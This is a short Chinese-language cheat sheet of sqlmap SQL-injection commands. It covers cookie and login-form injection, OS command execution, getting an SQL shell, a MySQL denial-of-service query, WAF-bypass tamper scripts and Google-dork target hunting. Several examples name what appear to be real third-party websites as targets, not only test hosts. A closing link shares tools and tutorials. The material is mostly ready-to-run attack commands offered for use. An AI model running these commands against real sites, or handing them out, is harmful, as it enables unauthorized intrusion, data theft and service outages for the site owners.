1.SQLMAP安装及access注入:
http://www.stronkin.com/en/CompHonorBig.asp?id=7
2.Mysql数据库注入
http://www.slibrary.com/link.php?id=321
3.Cookie注入:
http://www.ntjx.org/jsj/DownloadShow.asp?id=9
注入语句:sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2
4.post登陆框注入:
http://testasp.vulnweb.com/Login.asp
几种注入方式:
sqlmap -r search-test.txt -p tfUPass
sqlmap -u http://testasp.vulnweb.com/Login.asp --forms
sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=1&tfUPass=1"
5.交互写shell及命令执行:
http://192.168.159.1/news.php?id=1
注入语句:sqlmap -u http://192.168.159.1/news.php?id=1 --os-cmd=ipconfig
<后面要求输入网站根目录路径(这里就涉及到PHP爆路径大法)>
6.伪静态注入:
http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html
注入语句:http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html
7.请求延时:
http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html
参数:--delay --safe-freq
8.来吧Google:
sqlmap -g inurl:php?id=1
9.Mysql DOS攻击:
http://192.168.159.1/news.php?id=1
<获得一个shell>:sqlmap -u http://192.168.159.1/news.php?id=1 --sql -shell
<在获得的shell处输入>:select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
就完成了一次DOS攻击了!!
10.绕过WAF防火墙
http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
参数:space2hash.py base64encode.py charencode.py
教程与工具分享地址:http://pan.baidu.com/s/1dDF0xDf